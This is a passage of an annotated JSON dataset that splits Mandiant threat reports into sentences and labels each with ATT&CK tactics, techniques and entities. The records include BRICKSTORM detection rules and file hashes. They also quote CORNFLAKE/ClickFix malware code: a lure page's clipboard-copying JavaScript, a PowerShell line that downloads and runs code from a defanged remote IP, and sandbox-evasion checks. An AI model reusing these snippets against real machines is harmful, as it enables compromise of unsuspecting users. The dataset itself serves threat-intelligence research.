further, determine the source of the network activity and verify if the communication is consistent with the device's intended use and standard allow-list domains.\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s223-4bee39", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 223, "context_before": "To investigate this activity further, determine the source of the network activity and verify if the communication is consistent with the device's intended use and standard allow-list domains.\"", "sentence_text": "events:\n$c1.metadata.event_type = \"NETWORK_CONNECTION\" $c1.target.ip = /^(8\\.8\\.8\\.8|8\\.8\\.4\\.4)$/ nocase $c1.principal.hostname = \"\" $c1.principal.asset_id = \"\" ( $c1.target.port = 443 or $c1.target.url = /dns-query|:443\\/$|\\d\\.\\d\\.\\d\\.\\d\\/$/ nocase )\n$c2.metadata.event_type = \"NETWORK_CONNECTION\" $c2.principal.hostname = \"\" $c2.principal.asset_id = \"\" $c2.target.ip_geo_artifact.network.carrier_name = /cloudflare/ nocase $c2.target.port = 443 $source_entity = $c1.principal.ip $source_entity = $c2.principal.ip match:\n$source_entity over 1h outcome:\n$risk_score = max(65)\n$time_diff = math.abs(min($c1.metadata.event_timestamp.seconds) - min($c2.metadata.event_timestamp.seconds))\ncondition:\n$c1 and $c2 and $time_diff <= 2 options:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s224-1200f3", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 224, "context_before": "events:\n$c1.metadata.event_type = \"NETWORK_CONNECTION\" $c1.target.ip = /^(8\\.8\\.8\\.8|8\\.8\\.4\\.4)$/ nocase $c1.principal.hostname = \"\" $c1.principal.asset_id = \"\" ( $c1.target.port = 443 or $c1.target.url = /dns-query|:443\\/$|\\d\\.\\d\\.\\d\\.\\d\\/$/ nocase )\n$c2.metadata.event_type = \"NETWORK_CONNECTION\" $c2.principal.hostname = \"\" $c2.principal.asset_id = \"\" $c2.target.ip_geo_artifact.network.carrier_name = /cloudflare/ nocase $c2.target.port = 443 $source_entity = $c1.principal.ip $source_entity = $c2.principal.ip match:\n$source_entity over 1h outcome:\n$risk_score = max(65)\n$time_diff = math.abs(min($c1.metadata.event_timestamp.seconds) - min($c2.metadata.event_timestamp.seconds))\ncondition:\n$c1 and $c2 and $time_diff <= 2 options:", "sentence_text": "allow_zero_values = true } Unknown Endpoint Generating Google DNS-over-HTTPS and Amazon Hosted IP Communication rule hunting_t1071_001_unknown_endpoint_generating_google_doh_and_amazon_communication { meta:\nrule_name = \"Unknown Endpoint Generating Google DNS-over-HTTPS and Amazon Hosted IP Communication\" severity = \"Medium\" tactic = \"TA0011\" // Command and Control technique = \"T1071.001\" // Application Layer Protocol: Web Protocols reference = \"https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign\" description = \"Detects on requests by an unknown source IP address to Google DNS-over-HTTPS (DoH) resolver service and an Amazon hosted IP address.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s225-89a8fa", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 225, "context_before": "allow_zero_values = true } Unknown Endpoint Generating Google DNS-over-HTTPS and Amazon Hosted IP Communication rule hunting_t1071_001_unknown_endpoint_generating_google_doh_and_amazon_communication { meta:\nrule_name = \"Unknown Endpoint Generating Google DNS-over-HTTPS and Amazon Hosted IP Communication\" severity = \"Medium\" tactic = \"TA0011\" // Command and Control technique = \"T1071.001\" // Application Layer Protocol: Web Protocols reference = \"https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign\" description = \"Detects on requests by an unknown source IP address to Google DNS-over-HTTPS (DoH) resolver service and an Amazon hosted IP address.", "sentence_text": "To investigate this activity further, determine the source of the network activity and verify if the communication is consistent with the device's intended use and standard allow-list domains.\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s226-1c23a8", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 226, "context_before": "To investigate this activity further, determine the source of the network activity and verify if the communication is consistent with the device's intended use and standard allow-list domains.\"", "sentence_text": "events:\n$c1.metadata.event_type = \"NETWORK_CONNECTION\" $c1.target.ip = /^(8\\.8\\.8\\.8|8\\.8\\.4\\.4)$/ nocase $c1.principal.hostname = \"\" $c1.principal.asset_id = \"\" ( $c1.target.port = 443 or $c1.target.url = /dns-query|:443\\/$|\\d\\.\\d\\.\\d\\.\\d\\/$/ nocase )\n$c2.metadata.event_type = \"NETWORK_CONNECTION\" $c2.principal.hostname = \"\" $c2.principal.asset_id = \"\" $c2.target.ip_geo_artifact.network.carrier_name = /amazon/ nocase $c2.target.port = 443 $source_entity = $c1.principal.ip $source_entity = $c2.principal.ip match:\n$source_entity over 24h outcome:\n$risk_score = max(65)\n$time_diff = math.abs(min($c1.metadata.event_timestamp.seconds) - min($c2.metadata.event_timestamp.seconds))\ncondition:\n// As observed by Mandiant IR, the two connection events to DoH and Amazon occurred nearly simultaneously $c1 and $c2 and $time_diff <= 2 options:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s227-d85056", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 227, "context_before": "events:\n$c1.metadata.event_type = \"NETWORK_CONNECTION\" $c1.target.ip = /^(8\\.8\\.8\\.8|8\\.8\\.4\\.4)$/ nocase $c1.principal.hostname = \"\" $c1.principal.asset_id = \"\" ( $c1.target.port = 443 or $c1.target.url = /dns-query|:443\\/$|\\d\\.\\d\\.\\d\\.\\d\\/$/ nocase )\n$c2.metadata.event_type = \"NETWORK_CONNECTION\" $c2.principal.hostname = \"\" $c2.principal.asset_id = \"\" $c2.target.ip_geo_artifact.network.carrier_name = /amazon/ nocase $c2.target.port = 443 $source_entity = $c1.principal.ip $source_entity = $c2.principal.ip match:\n$source_entity over 24h outcome:\n$risk_score = max(65)\n$time_diff = math.abs(min($c1.metadata.event_timestamp.seconds) - min($c2.metadata.event_timestamp.seconds))\ncondition:\n// As observed by Mandiant IR, the two connection events to DoH and Amazon occurred nearly simultaneously $c1 and $c2 and $time_diff <= 2 options:", "sentence_text": "allow_zero_values = true } Posted in Threat Intelligence Related articles Threat Intelligence Keys to the Kingdom: A Defender's Guide to Privileged Account Monitoring By Mandiant • 39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s228-60b5cd", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 228, "context_before": "allow_zero_values = true } Posted in Threat Intelligence Related articles Threat Intelligence Keys to the Kingdom: A Defender's Guide to Privileged Account Monitoring By Mandiant • 39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "sentence_text": "Posting Campaigns to Deliver Malware and Steal Credentials By Google Threat Intelligence Group • 6-minute read Threat Intelligence Pro-Russia Information Operations Leverage Russian Drone Incursions into Polish Airspace By Google Threat Intelligence Group • 7-minute read Threat Intelligence To Be (A Robot) or Not to Be: New Malware Attributed to Russia State-Sponsored COLDRIVER By Google Threat Intelligence Group • 12-minute read [FILTERED_TABLES_START]\n90b760ed1d0dcb3ef0f2b6d6195c9d852bcb65eca293578982a8c4b64f51b035 | pg_update | BRICKSTORM 2388ed7aee0b6b392778e8f9e98871c06499f476c9e7eae6ca0916f827fe65df | spclisten | BRICKSTORM aa688682d44f0c6b0ed7f30b981a609100107f2d414a3a6e5808671b112d1878 | vmp | BRICKSTORM", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-22_mandiant_report-p1-s229-133612", "source": "mandiant", "doc_id": "22_mandiant_report", "page_number": 1, "sentence_id": 229, "context_before": "Posting Campaigns to Deliver Malware and Steal Credentials By Google Threat Intelligence Group • 6-minute read Threat Intelligence Pro-Russia Information Operations Leverage Russian Drone Incursions into Polish Airspace By Google Threat Intelligence Group • 7-minute read Threat Intelligence To Be (A Robot) or Not to Be: New Malware Attributed to Russia State-Sponsored COLDRIVER By Google Threat Intelligence Group • 12-minute read [FILTERED_TABLES_START]\n90b760ed1d0dcb3ef0f2b6d6195c9d852bcb65eca293578982a8c4b64f51b035 | pg_update | BRICKSTORM 2388ed7aee0b6b392778e8f9e98871c06499f476c9e7eae6ca0916f827fe65df | spclisten | BRICKSTORM aa688682d44f0c6b0ed7f30b981a609100107f2d414a3a6e5808671b112d1878 | vmp | BRICKSTORM", "sentence_text": "[FILTERED_TABLES_END]", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s1-9fe0d9", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "UNC5518 appears to partner with clients or affiliates who use access obtained by the group to deploy additional malware.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": null, "procedure": "UNC5518 partners with affiliates who leverage obtained access to deploy additional malware.", "entities": [ { "text": "UNC5518", "start": 0, "end": 7, "label": "ThreatActor" }, { "text": "partner with clients or affiliates", "start": 19, "end": 53, "label": "Action" }, { "text": "deploy additional malware", "start": 94, "end": 119, "label": "Action" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s2-32b026", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 2, "context_before": "UNC5518 appears to partner with clients or affiliates who use access obtained by the group to deploy additional malware.", "sentence_text": "While the initial compromise and fake CAPTCHA deployment are orchestrated by UNC5518, the payloads served belong to other threat groups.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1189", "name": "Drive-by Compromise" } ], "procedure": "Orchestrated initial compromise by deploying a fake CAPTCHA to facilitate delivery of malicious payloads from affiliated threat groups.", "entities": [ { "text": " UNC5518", "start": 76, "end": 84, "label": "ThreatActor" }, { "text": "the initial compromise and fake CAPTCHA deployment are orchestrated by UNC5518", "start": 6, "end": 84, "label": "Action" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s3-d055db", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 3, "context_before": "While the initial compromise and fake CAPTCHA deployment are orchestrated by UNC5518, the payloads served belong to other threat groups.", "sentence_text": "UNC5518 utilizes downloader scripts that function as an access-as-a-service.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": null, "procedure": "Use downloader scripts that function as an access-as-a-service.", "entities": [ { "text": "UNC5518", "start": 0, "end": 7, "label": "ThreatActor" }, { "text": "utilizes downloader scripts", "start": 8, "end": 35, "label": "Action" }, { "text": "downloader scripts", "start": 17, "end": 35, "label": "MalwareTool" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s4-b3c3d7", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 4, "context_before": "UNC5518 utilizes downloader scripts that function as an access-as-a-service.", "sentence_text": "Several distinct threat actors have been observed leveraging the access provided by UNC5518, including:\nUNC5774: A financially motivated group known to use CORNFLAKE backdoor to deploy a variety of subsequent payloads.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Financially motivated threat actor leverages access from UNC5518 and uses the CORNFLAKE backdoor to deploy additional payloads", "entities": [ { "text": "UNC5774", "start": 104, "end": 111, "label": "ThreatActor" }, { "text": " CORNFLAKE backdoor ", "start": 155, "end": 175, "label": "MalwareTool" }, { "text": "to deploy a variety of subsequent payloads", "start": 175, "end": 217, "label": "Action" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s5-55de28", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 5, "context_before": "Several distinct threat actors have been observed leveraging the access provided by UNC5518, including:\nUNC5774: A financially motivated group known to use CORNFLAKE backdoor to deploy a variety of subsequent payloads.", "sentence_text": "This blog post details a campaign where Mandiant identified UNC5518 deploying a downloader that delivers CORNFLAKE.V3 malware.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": null, "procedure": "Deploy a downloader that delivers CORNFLAKE.V3 malware.", "entities": [ { "text": "UNC5518", "start": 60, "end": 67, "label": "ThreatActor" }, { "text": "deploying a downloader that delivers CORNFLAKE.V3 malware", "start": 68, "end": 125, "label": "Action" }, { "text": "downloader", "start": 80, "end": 90, "label": "MalwareTool" }, { "text": "CORNFLAKE.V3 malware", "start": 105, "end": 125, "label": "MalwareTool" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s6-7a489d", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 6, "context_before": "This blog post details a campaign where Mandiant identified UNC5518 deploying a downloader that delivers CORNFLAKE.V3 malware.", "sentence_text": "Supported payload types include shell commands, executables and dynamic link libraries (DLLs).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s7-369224", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 7, "context_before": "Supported payload types include shell commands, executables and dynamic link libraries (DLLs).", "sentence_text": "Downloaded payloads are written to disk and executed.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": null, "procedure": "Write downloaded payloads to disk and execute them.", "entities": [ { "text": "Downloaded payloads", "start": 0, "end": 19, "label": "MalwareTool" }, { "text": "are written to disk and executed", "start": 20, "end": 52, "label": "Action" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s8-305cb3", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 8, "context_before": "Downloaded payloads are written to disk and executed.", "sentence_text": "CORNFLAKE.V3 collects basic system information and sends it to a remote server via HTTP.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" }, { "id": "T1071.001", "name": "Application Layer Protocol: Web Protocols" } ], "procedure": "Collect system information and send it to remote server via HTTP.", "entities": [ { "text": "CORNFLAKE.V3", "start": 0, "end": 12, "label": "MalwareTool" }, { "text": "collects basic system information", "start": 13, "end": 46, "label": "Action" }, { "text": "sends it to a remote server via HTTP", "start": 51, "end": 87, "label": "Action" }, { "text": "remote server", "start": 65, "end": 78, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s9-6941da", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 9, "context_before": "CORNFLAKE.V3 collects basic system information and sends it to a remote server via HTTP.", "sentence_text": "CORNFLAKE.V3 has also been observed abusing Cloudflare Tunnels to proxy traffic to remote servers.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "Abuse Cloudflare Tunnels to proxy traffic to remote servers.", "entities": [ { "text": "CORNFLAKE.V3", "start": 0, "end": 12, "label": "MalwareTool" }, { "text": "abusing Cloudflare Tunnels to proxy traffic to remote servers", "start": 36, "end": 97, "label": "Action" }, { "text": "Cloudflare Tunnels", "start": 44, "end": 62, "label": "Infrastructure_Indicator" }, { "text": "remote servers", "start": 83, "end": 97, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s10-798e1b", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 10, "context_before": "CORNFLAKE.V3 has also been observed abusing Cloudflare Tunnels to proxy traffic to remote servers.", "sentence_text": "CORNFLAKE.V3 is an updated version of CORNFLAKE.V2, sharing a significant portion of its codebase.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s11-3b92f0", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 11, "context_before": "CORNFLAKE.V3 is an updated version of CORNFLAKE.V2, sharing a significant portion of its codebase.", "sentence_text": "Unlike V2, which functioned solely as a downloader, V3 features host persistence via a registry Run key, and supports additional payload types.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547.001", "name": "Registry Run Keys / Startup Folder" } ], "procedure": "Establish persistence via registry Run key.", "entities": [ { "text": "V3", "start": 52, "end": 54, "label": "MalwareTool" }, { "text": "features host persistence", "start": 55, "end": 80, "label": "Action" }, { "text": "registry Run key", "start": 87, "end": 103, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s12-0c187d", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 12, "context_before": "Unlike V2, which functioned solely as a downloader, V3 features host persistence via a registry Run key, and supports additional payload types.", "sentence_text": "The original CORNFLAKE malware differed significantly from later iterations, as it was written in C.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s13-ac051d", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 13, "context_before": "The original CORNFLAKE malware differed significantly from later iterations, as it was written in C.", "sentence_text": "This first variant functioned as a downloader, gathering basic system information and transmitting it via TCP to a remote server.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" }, { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Function as a downloader, gather basic system information, and transmit it via TCP to a remote server.", "entities": [ { "text": "functioned as a downloader", "start": 19, "end": 45, "label": "Action" }, { "text": "downloader", "start": 35, "end": 45, "label": "MalwareTool" }, { "text": "gathering basic system information", "start": 47, "end": 81, "label": "Action" }, { "text": "transmitting it via TCP to a remote server", "start": 86, "end": 128, "label": "Action" }, { "text": "remote server", "start": 115, "end": 128, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s14-fe52cb", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 14, "context_before": "This first variant functioned as a downloader, gathering basic system information and transmitting it via TCP to a remote server.", "sentence_text": "Subsequently, it would download and execute a payload.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Downloader retrieves and executes a payload", "entities": [ { "text": "download and execute a payload", "start": 23, "end": 53, "label": "Action" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s15-9f738c", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 15, "context_before": "Subsequently, it would download and execute a payload.", "sentence_text": "Initial Lead\nWindows+R\nshortcut.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s16-6e12d7", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 16, "context_before": "Initial Lead\nWindows+R\nshortcut.", "sentence_text": "Evidence of this activity was found in the HKEY_USERS\\User\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU registry key, containing the following entry which resulted in the download and execution of the next payload:\nName: a\nValue: powershell -w", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.001", "name": "PowerShell" } ], "procedure": "PowerShell command recorded in RunMRU registry key triggers download and execution of a subsequent payload", "entities": [ { "text": "powershell ", "start": 243, "end": 254, "label": "MalwareTool" }, { "text": "HKEY_USERS\\User\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU", "start": 43, "end": 116, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s18-d70a70", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 18, "context_before": "-c", "sentence_text": "The RunMRU registry key stores the history of commands entered into the Windows Run (shortcut Windows+R ) dialog box.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s19-d8abd4", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 19, "context_before": "The RunMRU registry key stores the history of commands entered into the Windows Run (shortcut Windows+R ) dialog box.", "sentence_text": "The execution of malicious scripts using the Windows+R shortcut is often indicative of users who have fallen victim to ClickFix lure pages.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Execute malicious scripts via Windows Run dialog.", "entities": [ { "text": "execution of malicious scripts", "start": 4, "end": 34, "label": "Action" }, { "text": "Windows+R shortcut", "start": 45, "end": 63, "label": "Infrastructure_Indicator" }, { "text": "ClickFix lure pages", "start": 119, "end": 138, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s20-069a24", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 20, "context_before": "The execution of malicious scripts using the Windows+R shortcut is often indicative of users who have fallen victim to ClickFix lure pages.", "sentence_text": "Users typically land on such pages as a result of benign browsing leading to interaction with search results that employ SEO poisoning or malicious ads.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s21-c4b4cd", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 21, "context_before": "Users typically land on such pages as a result of benign browsing leading to interaction with search results that employ SEO poisoning or malicious ads.", "sentence_text": "As seen in the Figure 2, the user was lured into pasting a hidden script into the Windows Run dialog box which was automatically copied to the clipboard by the malicious web page when the user clicked on the image.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204.002", "name": "User Execution: Malicious File" } ], "procedure": "Lure user to paste hidden script into Run dialog.", "entities": [ { "text": "lured into pasting a hidden script", "start": 38, "end": 72, "label": "Action" }, { "text": "Windows Run dialog box", "start": 82, "end": 104, "label": "Infrastructure_Indicator" }, { "text": "malicious web page", "start": 160, "end": 178, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s22-383161", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 22, "context_before": "As seen in the Figure 2, the user was lured into pasting a hidden script into the Windows Run dialog box which was automatically copied to the clipboard by the malicious web page when the user clicked on the image.", "sentence_text": "The webpage accomplished this with the following JavaScript code:\n// An image with the reCAPTCHA logo is displayed on the webpage
\"reCAPTCHA I'm not a robot
//", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s23-17b04d", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 23, "context_before": "The webpage accomplished this with the following JavaScript code:\n// An image with the reCAPTCHA logo is displayed on the webpage
\"reCAPTCHA I'm not a robot
//", "sentence_text": "The malicious script is saved in variable _0xC var _0xC", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s24-206fcd", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 24, "context_before": "The malicious script is saved in variable _0xC var _0xC", "sentence_text": "= \"powershell -w h -c \"$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band 0xfffffffffffffff0;irm 138.199.161[.]141:8080/$u|iex\"\\1\";\n//", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s25-00e388", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 25, "context_before": "= \"powershell -w h -c \"$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band 0xfffffffffffffff0;irm 138.199.161[.]141:8080/$u|iex\"\\1\";\n//", "sentence_text": "When the image is clicked, the script is copied to the clipboard document.getElementById(\"j\").onclick = function(){ var ta = document.createElement(\"textarea\");\nta.value = _0xC;\ndocument.body.appendChild(ta);\nta.select();\ndocument.execCommand(\"copy\");\nThe PowerShell command copied to clipboard is designed to download and execute a script from the remote server 138.199.161[.]141:8080/$u , where $u indicates the UNIX epoch timestamp of the download.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1059.001", "name": "PowerShell" }, { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Download and execute script from remote server via PowerShell.", "entities": [ { "text": "download and execute a script", "start": 310, "end": 339, "label": "Action" }, { "text": "PowerShell command", "start": 256, "end": 274, "label": "MalwareTool" }, { "text": "remote server 138.199.161[.]141:8080/$u", "start": 349, "end": 388, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s26-b88f74", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 26, "context_before": "When the image is clicked, the script is copied to the clipboard document.getElementById(\"j\").onclick = function(){ var ta = document.createElement(\"textarea\");\nta.value = _0xC;\ndocument.body.appendChild(ta);\nta.select();\ndocument.execCommand(\"copy\");\nThe PowerShell command copied to clipboard is designed to download and execute a script from the remote server 138.199.161[.]141:8080/$u , where $u indicates the UNIX epoch timestamp of the download.", "sentence_text": "$Manufacturer = Get-WmiObject Win32_ComputerSystem | Select-Object -ExpandProperty", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s27-2de470", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 27, "context_before": "$Manufacturer = Get-WmiObject Win32_ComputerSystem | Select-Object -ExpandProperty", "sentence_text": "Manufacturer # Exit if running in QEMU (VM detection).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s28-a71e49", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 28, "context_before": "Manufacturer # Exit if running in QEMU (VM detection).", "sentence_text": "if ($Manufacturer -eq \"QEMU\") { exit 0;\n}\n# Get memory info for evasion check.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s29-d2530f", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 29, "context_before": "if ($Manufacturer -eq \"QEMU\") { exit 0;\n}\n# Get memory info for evasion check.", "sentence_text": "$TotalMemoryGb =\n(Get-CimInstance Win32_ComputerSystem).TotalPhysicalMemory / 1GB $AvailableMemoryGb = (Get-CimInstance Win32_OperatingSystem).FreePhysicalMemory / 1MB $UsedMemoryGb = $TotalMemoryGb - $AvailableMemoryGb # Exit if total memory is low or calculated \"used\" memory is low (possible sandbox detection).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s30-8ec926", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 30, "context_before": "$TotalMemoryGb =\n(Get-CimInstance Win32_ComputerSystem).TotalPhysicalMemory / 1GB $AvailableMemoryGb = (Get-CimInstance Win32_OperatingSystem).FreePhysicalMemory / 1MB $UsedMemoryGb = $TotalMemoryGb - $AvailableMemoryGb # Exit if total memory is low or calculated \"used\" memory is low (possible sandbox detection).", "sentence_text": "if ($env:COMPUTERNAME -match \"DESKTOP-S*\") { exit 0 } # Pause execution briefly.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s31-1544d8", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 31, "context_before": "if ($env:COMPUTERNAME -match \"DESKTOP-S*\") { exit 0 } # Pause execution briefly.", "sentence_text": "sleep 1\n# Define download URL (defanged).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s32-cfdc9b", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 32, "context_before": "sleep 1\n# Define download URL (defanged).", "sentence_text": "$ZipURL = \"hxxps://nodejs[.]org/dist/v22.11.0/node-v22.11.0-win-x64.zip\" # Define destination folder (AppData).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s33-169552", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 33, "context_before": "$ZipURL = \"hxxps://nodejs[.]org/dist/v22.11.0/node-v22.11.0-win-x64.zip\" # Define destination folder (AppData).", "sentence_text": "$DestinationFolder = [System.IO.Path]::Combine($env:APPDATA, \"\")\n# Define temporary file path for download.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s34-c8e5a9", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 34, "context_before": "$DestinationFolder = [System.IO.Path]::Combine($env:APPDATA, \"\")\n# Define temporary file path for download.", "sentence_text": "$ZipFile = [System.IO.Path]::Combine($env:TEMP, \"downloaded.zip\")\n# Download the Node.js zip file.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s35-708463", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 35, "context_before": "$ZipFile = 